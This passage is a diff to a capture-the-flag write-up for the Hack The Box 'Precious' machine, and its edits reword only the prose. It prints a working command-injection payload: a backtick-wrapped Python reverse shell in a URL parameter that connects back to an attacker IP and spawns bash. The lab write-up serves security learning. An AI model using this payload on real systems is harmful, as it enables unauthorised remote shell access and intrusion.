JavaliMZ/JavaliMZ.github.io/src/HTB-Linux-Easy-Precious.md

 http://10.10.14.144/?name=%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.144",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'`
 ```

-The query needs to be that exact and we need to adapt the IP and the port, and we need to setup a listener to capture the shell.
+The query needs to be that exact and we need to adapt the IP and the port.
+We need to setup a listener to capture the shell too.

 ![Reverse Shell](Assets/HTB-Linux-Easy-Precious/ReverseShell.png)

 # Foothold

 We are in the machine.
 But we have low privilege.
 We need more!!
-HUAAHAHA
+HUAAHAHA!!

 Digging through the folders and files, we'll find credentials for a service used by the user henry.